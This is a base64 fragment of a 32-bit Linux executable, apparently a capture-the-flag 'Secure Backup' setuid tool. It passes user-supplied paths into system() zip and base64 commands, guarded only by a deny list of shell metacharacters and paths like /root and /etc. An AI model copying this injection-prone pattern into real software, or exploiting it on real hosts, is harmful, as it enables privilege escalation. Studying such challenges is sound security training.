AAAAAAAAABIAAABtAAAAAAAAAAAAAAASAAAAYAAAAAAAAAAAAAAAEgAAAHUAAAAAAAAAAAAAABIA
AABOAAAAAAAAAAAAAAASAAAAkQAAAAAAAAAAAAAAEgAAAHwAAAAAAAAAAAAAABIAAAAhAAAAAAAA
AAAAAAASAAAAWQAAAAAAAAAAAAAAEgAAAEkAAAAAAAAAAAAAABIAAACKAAAAAAAAAAAAAAASAAAA
UwAAAAAAAAAAAAAAEgAAAMAAAAAAAAAAAAAAACAAAAAoAAAAAAAAAAAAAAASAAAANQAAAAAAAAAA
AAAAEgAAAJkAAAAAAAAAAAAAABIAAACuAAAAAAAAAAAAAAASAAAAOwAAAAAAAAAAAAAAEgAAAEEA
AAAAAAAAAAAAABIAAAA2AAAAAAAAAAAAAAASAAAAoAAAAAAAAAAAAAAAEgAAABoAAAAAAAAAAAAA
ABIAAAAtAAAAAAAAAAAAAAASAAAAgwAAAAAAAAAAAAAAEgAAAAsAAAA8kwQIBAAAABEAEAAAbGli
Yy5zby42AF9JT19zdGRpbl91c2VkAHNldHVpZABzdHJjcHkAZXhpdABzcHJpbnRmAHNyYW5kAGZv
cGVuAHN0cm5jcHkAcHV0cwB0aW1lAGNsb2NrAGdldHBpZABmZ2V0cwBzdHJzdHIAc3RyY3NwbgBm
Y2xvc2UAc3RyY2F0AHJlbW92ZQBzeXN0ZW0AZ2V0ZXVpZABzdHJjaHIAYWNjZXNzAHN0cmNtcABf
X2xpYmNfc3RhcnRfbWFpbgBfX2dtb25fc3RhcnRfXwBHTElCQ18yLjEAR0xJQkNfMi4wAAAAAAIA
AgACAAIAAgADAAIAAgACAAIAAgACAAIAAgAAAAIAAgACAAIAAwACAAIAAgACAAIAAgABAAEAAgAB
AAAAEAAAAAAAAAARaWkNAAADAM8AAAAQAAAAEGlpDQAAAgDZAAAAAAAAAPy/BAgGDwAADMAECAcB
AAAQwAQIBwIAABTABAgHAwAAGMAECAcEAAAcwAQIBwUAACDABAgHBgAAJMAECAcHAAAowAQIBwgA
ACzABAgHCQAAMMAECAcKAAA0wAQIBwsAADjABAgHDAAAPMAECAcNAABAwAQIBw4AAETABAgHEAAA
SMAECAcRAABMwAQIBxIAAFDABAgHEwAAVMAECAcUAABYwAQIBxUAAFzABAgHFgAAYMAECAcXAABk
wAQIBxgAAGjABAgHGQAAbMAECAcaAABTg+wI6P8BAACBw086AACLg/z///+FwHQF6KoBAACDxAhb
wwAAAAAA/zUEwAQI/yUIwAQIAAAAAP8lDMAECGgAAAAA6eD/////JRDABAhoCAAAAOnQ/////yUU
wAQIaBAAAADpwP////8lGMAECGgYAAAA6bD/////JRzABAhoIAAAAOmg/////yUgwAQIaCgAAADp
kP////8lJMAECGgwAAAA6YD/////JSjABAhoOAAAAOlw/////yUswAQIaEAAAADpYP////8lMMAE
CGhIAAAA6VD/////JTTABAhoUAAAAOlA/////yU4wAQIaFgAAADpMP////8lPMAECGhgAAAA6SD/
////JUDABAhoaAAAAOkQ/////yVEwAQIaHAAAADpAP////8lSMAECGh4AAAA6fD+////JUzABAho
gAAAAOng/v///yVQwAQIaIgAAADp0P7///8lVMAECGiQAAAA6cD+////JVjABAhomAAAAOmw/v//
/yVcwAQIaKAAAADpoP7///8lYMAECGioAAAA6ZD+////JWTABAhosAAAAOmA/v///yVowAQIaLgA
AADpcP7///8lbMAECGjAAAAA6WD+////Jfy/BAhmkAAAAAAAAAAAMe1eieGD5PBQVFJoIJMECGjA
kgQIUVZo/YkECOhP////9GaQZpBmkGaQZpBmkGaQixwkw2aQZpBmkGaQZpBmkLh7wAQILXjABAiD
+AZ2GrgAAAAAhcB0EVWJ5YPsFGh4wAQI/9CDxBDJ88OQjXQmALh4wAQILXjABAjB+AKJwsHqHwHQ
0fh0G7oAAAAAhdJ0ElWJ5YPsEFBoeMAECP/Sg8QQyfPDjXQmAI28JwAAAACAPXjABAgAdRNVieWD
7AjofP///8YFeMAECAHJ88NmkLgQvwQIixCF0nUF65ONdgC6AAAAAIXSdPJVieWD7BRQ/9KDxBDJ
6XX///9VieWLRQwpRQiLRRApRQiLRRDB6A0xRQiLRRApRQyLRQgpRQyLRQjB4AgxRQyLRQgpRRCL
RQwpRRCLRQzB6A0xRRCLRQwpRQiLRRApRQiLRRDB6AwxRQiLRRApRQyLRQgpRQyLRQjB4BAxRQyL
RQgpRRCLRQwpRRCLRQzB6AUxRRCLRQwpRQiLRRApRQiLRRDB6AMxRQiLRRApRQyLRQgpRQyLRQjB
4AoxRQyLRQgpRRCLRQwpRRCLRQzB6A8xRRCLRRBdw1WJ5YHs+AMAAIPsCP91CI2FEPz//1DoFf3/
/4PEEI2FEPz//1BoQJMECGhGkwQIaEyTBAjoh/z//4PEEJDJw1WJ5YHs+AMAAIPsCP91CI2FEPz/
/1Do1vz//4PEEI2FEPz//1BoQJMECGhZkwQIaF+TBAjoSPz//4PEEJDJw1WJ5YHsCAIAAIPsCP91
CI2FBP7//1Dol/z//4PEEI2FBP7//1BoQJMECGhZkwQIaGyTBAjoCfz//4PEEJDJw41MJASD5PD/
cfxVieVXVlNRgeyoEAAAicvoNfz//4PsDFDoHP3//4PEEMdF5AAAAADHReAAAAAAgzsDfwqD7Axq
Aeh8/P//i0MEg8AEiwCD7AhojJMECFDolvv//4PEEIXAD4THAQAAx0XgAQAAAIPsDGiQkwQI6Bf8
//+DxBCD7Axo2JMECOgH/P//g8QQg+wMaByUBAjo9/v//4PEEIPsDGhglAQI6Of7//+DxBCD7Axo
YJQECOjX+///g8QQg+wMaGCUBAjox/v//4PEEIPsDGhglAQI6Lf7//+DxBCD7AxoYJQECOin+///
g8QQg+wMaGCUBAjol/v//4PEEIPsDGiklAQI6If7//+DxBCD7AxoYJQECOh3+///g8QQg+wMaGCU
BAjoZ/v//4PEEIPsDGhglAQI6Ff7//+DxBCD7AxoYJQECOhH+///g8QQg+wMaGCUBAjoN/v//4PE
EIPsDGhglAQI6Cf7//+DxBCD7Axo6JQECOgX+///g8QQg+wMaCyVBAjoB/v//4PEEIPsDGhwlQQI
6Pf6//+DxBCD7AxotJUECOjn+v//g8QQg+wMaPSVBAjo1/r//4PEEIPsDGg0lgQI6Mf6//+DxBCD
7AxoeJYECOi3+v//g8QQg+wMaMCWBAjop/r//4PEEIPsDGgMlwQI6Jf6//+DxBCD7AxoWJcECOiH
+v//g8QQg+wMaKiXBAjod/r//4PEEIPsDGj4lwQI6Gf6//+DxBCLQwSDwAiLAIPsBGpkUI2FcP//
/1Doyvr//4PEEGbHhW7///8vAGbHhVP///8vZcaFVf///wBmx4VW////dGPGhVj///8Ag+wIjYVu
////UI2FU////4PABlDo5fn//4PEEI2FU////4PABrn/////icK4AAAAAInX8q6JyPfQjVD/jYVT
////g8AGAdBmxwBtAGbHhVz///95cMaFXv///wBmx4Vf////bGHGhWH///8AZseFYv///2NlxoVk
////AIPsCI2Fbv///1CNhVP///+DwBJQ6Gn5//+DxBCNhVP///+DwBK5/////4nCuAAAAACJ1/Ku
icj30I1Q/42FU////4PAEgHQZscAawBmx4Vo////ZXnGhWr///8AjYVT////g8AYZscAcwCD7AiN
hVP///9QjYXv/v//UOgC+f//g8QQx0XcAQAAAOsojY1T////i1XcidABwAHQAciD7AhQjYXv/v//
UOjF+P//g8QQg0XcAYN93Ah+0oPsCGhKmAQIjYXv/v//UOhE+f//g8QQiUXYg33YAHV5g33gAXUQ
g+wMaEyYBAjoZfv//4PEEIPsDGoB6Nj4//+D7AhoYpgECI2FB/v//1DoFPj//4PEEMaEBQf7//8A
g+wIjYUH+///UI2FcP///1Do0/f//4PEEIXAdR3HReQBAAAAg33gAXUQg+wMaGSYBAjoQfv//4PE
EIPsBP912GjoAwAAjYUH+///UOjI9///g8QQhcB1iYN95AF0IIN94AF1EIPsDGh8mAQI6Mj6//+D
xBCD7AxqAeg7+P//i0MEg8AMiwCD7Ahop5gECFDoRff//4PEEIXAdCqD7AxorJgECOjQ+v//g8QQ
g+wMaNCYBAjo0ff//4PEEIPsDGoA6PT3//+LQwSDwAyLAIPsCGjFngQIUOj+9v//g8QQhcB0KoPs
DGismAQI6In6//+DxBCD7Axo0JgECOiK9///g8QQg+wMagDorff//4tDBIPADIsAg+wIajtQ6Lr3
//+DxBCFwHQqg+wMaKyYBAjoRfr//4PEEIPsDGjQmAQI6Eb3//+DxBCD7AxqAOhp9///i0MEg8AM
iwCD7AhqJlDodvf//4PEEIXAdCqD7AxorJgECOgB+v//g8QQg+wMaNCYBAjoAvf//4PEEIPsDGoA
6CX3//+LQwSDwAyLAIPsCGpgUOgy9///g8QQhcB0KoPsDGismAQI6L35//+DxBCD7Axo0JgECOi+
9v//g8QQg+wMagDo4fb//4tDBIPADIsAg+wIaiRQ6O72//+DxBCFwHQqg+wMaKyYBAjoefn//4PE
EIPsDGjQmAQI6Hr2//+DxBCD7AxqAOid9v//i0MEg8AMiwCD7AhqfFDoqvb//4PEEIXAdCqD7Axo
rJgECOg1+f//g8QQg+wMaNCYBAjoNvb//4PEEIPsDGoA6Fn2//+LQwSDwAyLAIPsCGjLngQIUOhj
9f//g8QQhcB0KoPsDGismAQI6O74//+DxBCD7Axo0JgECOjv9f//g8QQg+wMagDoEvb//4tDBIPA
DIsAg+wIaM6eBAhQ6Cz1//+DxBCFwHUqg+wMaKyYBAjop/j//4PEEIPsDGjQmAQI6Kj1//+DxBCD
7AxqAOjL9f//i0MEg8AMiwCD7Aho0J4ECFDo1fT//4PEEIXAdCqD7AxorJgECOhg+P//g8QQg+wM
aNCYBAjoYfX//4PEEIPsDGoA6IT1//+DfeABdRSLQwSDwAyLAIPsDFDoa/j//4PEEItDBIPADIsA
g+wIUI2FE/n//1DoAvX//4PEEOgK9f//icaD7AxqAOi+9P//g8QQicPoJPX//4PsBFZTUOjk9v//
g8QQg+wMUOgt9f//g8QQ6HX1//+JRdSD7AT/ddRo1Z4ECI2FK/X//1Doi/X//4PEEI2FE/n//1CN
hSv1//9QaOieBAiNhU/v//9Q6Gn1//+DxBCD7AyNhU/v//9Q6Kf0//+DxBCD7AhqAI2FK/X//1Do
I/X//4PEEIP4/3RIg33gAXUQg+wMaKyYBAjoV/f//4PEEIPsBI2FK/X//1BoF58ECI2FT+///1Do
CvX//4PEEIPsDI2FT+///1DoSPT//4PEEOsWg33gAXUQg+wMaC6fBAjo0Pb//4PEEIN94AF1EIPs
DGhimAQI6Ar0//+DxBCD7AyNhSv1//9Q6Mj0//+DxBCD7Az/ddjoivP//4PEELgAAAAAjWXwWVte
X12NYfzDZpBmkGaQVVdWU+jn9P//gcM3LQAAg+wMi2wkII2zDP///+jH8v//jYMI////KcbB/gKF
9nQlMf+NtgAAAACD7AT/dCQs/3QkLFX/lLsI////g8cBg8QQOfd144PEDFteX13DjXYA88MAAFOD
7Ajog/T//4HD0ywAAIPECFvDAwAAAAEAAgAbWzM3bQAbWzMzbQAgJXNbIV0lcyAlcwoAG1szMm0A
ICVzWytdJXMgJXMKACAlc1srXSVzIFN0YXJ0aW5nIGFyY2hpdmluZyAlcwoALXEAAAoKCiAgICAg
ICAgICAgICBfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fAAAAACAgICAgICAgICAgIC8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgXAAAICAgICAgICAgICB8ICAgIF9fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fXyAgICAgfAAgICAgICAgICAgIHwgICB8ICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfCAgICB8ACAgICAgICAgICAgfCAgIHwg
ICAgICAgICAgICAgU2VjdXJlIEJhY2t1cCB2MS4wICAgICAgICAgICAgICB8ICAgIHwAICAgICAg
ICAgICB8ICAgfF9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX3wg
ICAgfAAgICAgICAgICAgIHwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICB8ACAgICAgICAgICAgIFxfX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fXy8AICAgICAgICAgICAgICAgICAgIFxfX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX18vAAAAACAgICAgICAgICAgICAgICBfX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXwAgICAgICAgICAgICAgXy0n
ICAgIC4tLi0uLS4tLi0uLS4tLi0uLS4tLi0uLS4tLi0uLS4tLi0uLS4gIC0tLSBgLV8AACAgICAg
ICAgICBfLScuLS4tLiAuLS0tLi0uLS4tLi0uLS4tLi0uLS4tLi0uLS4tLi0uLS4tLi0uLS0uICAu
LS4tLmAtXwAAACAgICAgICBfLScuLS4tLi0uIC4tLS0uLS4tLi0uLS4tLi0uLS4tLi0uLS4tLi0u
LS4tLi0uLS4tYF9fYC4gLi0uLS4tLmAtXwAAAAAgICAgXy0nLi0uLS4tLi0uIC4tLS0tLS4tLi0u
LS4tLi0uLS4tLi0uLS4tLi0uLS4tLi0uLS4tLi0tLS0tLiAuLS4tLi0uLS5gLV8AIF8tJy4tLi0u
LS4tLi0uIC4tLS0uLS4gLi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLiAuLS4tLS0uIC4t
LS0uLS4tLi0uYC1fAAA6LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS06AGAtLS0uXy4tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS5fLi0t
LScKCgByAENvdWxkIG5vdCBvcGVuIGZpbGUKCgAKAFZhbGlkYXRlZCBhY2Nlc3MgdG9rZW4AAEFo
LWFoLWFoISBZb3UgZGlkbid0IHNheSB0aGUgbWFnaWMgd29yZCEKCgAuLgAAAEZpbmlzaGVkISBF
bmNvZGVkIGJhY2t1cCBpcyBiZWxvdzoKAFVFc0RCRE1EQVFCakFHKytJa3NBQUFBQTdRTUFBQmdL
QUFBSUFBc0FjbTl2ZEM1MGVIUUJtUWNBQWdCQlJRRUlBRWJCS0JsMHJGcmF5cWZid0oyWXlIdW5u
WXExWmE2RzdYTG84QzNSSC9odTBmQXJwU3ZZYXVxNEFVeWNSbUx1V3ZQeUprM3NGK0htTk1jaU5I
ZkZOTEQzTGRrR21nd1NXOGo1MHhsTzZTV2lINXFVMUVkejM0MGJ4cFNsdmFLdkU0aG5LL29hbjR3
V1BhYmh3LzJyd2FhSlNYdWNVK3BMZ1pvclk2N1EvWTZjZkEyaExXSmFiZ2VvYktqTXkwbmpnQzlj
OGNRRGFWcmZFL1ppUzFTK3JQZ3ovZTJQYzNsZ2tRK2xBVkJxam80em1wUWx0Z0lYYXVDZGh2bEEx
UGUvQlhoUFFCSmFiN05WRjZYbTMyMDdFZkQzdXRicmN1VXVReUYrclFoRENLc0FFaHFRK1l5cDFU
cTJvNkJ2V0psaHRXZHRzN3JDdWJlb1pQREJENk1lanAzWFlrYlNZWWJ6bWdyMXBvTnFuelQ1WFBp
WG5Qd1ZxSDFmRzhPU081NnhBdnh4Mm1VMkVQK1loZ280T0FnaHlXMXNnVjhGeGVuVjhwNWMrdTli
VEJUei83V2xRREkwSFVzRkFPSG5XQlRZUjRIVHZ5aThPUFpYS213c1BBRzFocmxjck5EcVBycHNt
eHhtVlI4eFNSYkJETFNySDE0cFhZS1BZL2E0QVpLTy9HdFZNVUxscnBicElGcVo5OHp3bVJPRnN0
bVBsL2NJVE5ZV0JsTHRKNUFtc3lDeEJ5YmZMeEhkSktITXNLNlJwNE1PK3dYcmQvRVpOeE04bG5X
NlhOT1ZnbkZITUJzeEprcXNZSVdsTzBNTXlVOUwxQ0wyUlJ3bTJRdmJkRDhQTFdBL2pwMWZ1WVVk
V3h2UVd0N05qbVhvN2NyQzFkQTBCRFBnNXBWTnhUck9jNmxBRHA3eHZHSy9rUDRGMGVSKzUzYTRk
U0wwYjZ4Rm5iTDdXd1JwY0YrQXRlL1V0MjJXbEZyZzlBOGdxQkM4VWIxU25CVTJiOTNFbGJHOVNG
em5vNVRGbXpYazNvbmJMYWFFVlpsOUFLUEEzc0dFWFp2VlAranVlQURRc29rakpRd256ZzFCUkdG
bXFXYlI2aHhQYWdUVlhCYlEraHl0UWRkMjZQQ3VobVJVeU5qRUlCRngvWHFrU09mQWhMSTkrT2U0
RkgzaFlxYjFXNnhmWmNMaHBCczRWd2g3dDJXR3JFblVtMi9GK1gvT0Qrczl4ZVluaXlVckJURWFP
V0tFdjJOT1VadWRVNlgyVk9UWDZRYkhKcnlMZFNVOVhMSEIrbkVHZXErc2R0aWZkVUdlRkxjdCtF
ZTJwZ1IvQXNTZXhLbXpXMDljeDg2NUt1eEtuUjN5b0M2cm9VQmIzMElqbTV2UXV6Zy9STTcxUDVs
ZHBDSzcwUmVtWW5paU5lbHVCZkh3UUxPeGtEbi84TU4wQ0VCcjFlRnprQ05kYmxOQlZBN2I5bTdH
am9FaFFYT3BPcFNHclh3YmlISG01QzdabjRrWnRFeTcyOVpPbzcxT1Z1VDlpKzR2Q2lXUUxIcmR4
WWtxaUM3bG1mQ2pNaDllMDVXRXkxRUJtUGFGa1lneEsyYzZ4V0Vyc0V2MzgrKzh4ZHFBY2RFR1hK
QlIyUlQxVGx4Ry9ZbEI0QjdTd1VlbTR4RzZ6SllpNDUyRjFrbGhreGxvVjZwYU5MV3JjTHdva2RQ
SmVDSXJVYm4rQzlUZXNxb2FhWEFTbmljdHpOWFVLelQ5MDVPRk9jSnd0N0ZieHlYazB6M0Z4RC90
Z3RVSGNGQkxBUUkvQXpNREFRQmpBRysrSWtzQUFBQUE3UU1BQUJnS0FBQUlBQXNBQUFBQUFBQUFJ
SUMwZ1FBQUFBQnliMjkwTG5SNGRBR1pCd0FDQUVGRkFRZ0FVRXNGQmdBQUFBQUJBQUVBUVFBQUFC
NEVBQUFBQUE9PQAvcm9vdAAvLwAvAC9ldGMAL3RtcC8uYmFja3VwXyVpAAAAAC91c3IvYmluL3pp
cCAtciAtUCBtYWdpY3dvcmQgJXMgJXMgPiAvZGV2L251bGwAL3Vzci9iaW4vYmFzZTY0IC13MCAl
cwBUaGUgdGFyZ2V0IHBhdGggZG9lc24ndCBleGlzdAABGwM7SAAAAAgAAACE5v//ZAAAAC/p//+I
AAAA9On//6gAAAAz6v//yAAAAHLq///oAAAAser//wgBAAB08///TAEAANTz//+YAQAAFAAAAAAA
AAABelIAAXwIARsMBASIAQAAIAAAABwAAAAY5v//oAEAAAAOCEYODEoPC3QEeAA/GjsqMiQiHAAA
AEAAAACf6P//xQAAAABBDgiFAkINBQLBxQwEBAAcAAAAYAAAAETp//8/AAAAAEEOCIUCQg0Fe8UM
BAQAABwAAACAAAAAY+n//z8AAAAAQQ4IhQJCDQV7xQwEBAAAHAAAAKAAAACC6f//PwAAAABBDgiF
AkINBXvFDAQEAABAAAAAwAAAAKHp//+9CAAAAEQMAQBHEAUCdQBGDwN1cAYQBwJ1fBAGAnV4EAMC
dXQDpAjBDAEAQcNBxkHHQcVDDAQEAEgAAAAEAQAAIPL//10AAAAAQQ4IhQJBDgyHA0EOEIYEQQ4U
gwVODiBpDiREDihEDixBDjBNDiBHDhRBww4QQcYODEHHDghBxQ4EAAAQAAAAUAEAADTy//8CAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAFCIBAgwiAQIAAAAAAEAAAABAAAADAAAAKiFBAgNAAAAJJMECBkAAAAIvwQI
GwAAAAQAAAAaAAAADL8ECBwAAAAEAAAA9f7/b6yBBAgFAAAAjIMECAYAAADMgQQICgAAAOMAAAAL
AAAAEAAAABUAAAAAAAAAAwAAAADABAgCAAAAyAAAABQAAAARAAAAFwAAAOCEBAgRAAAA2IQECBIA
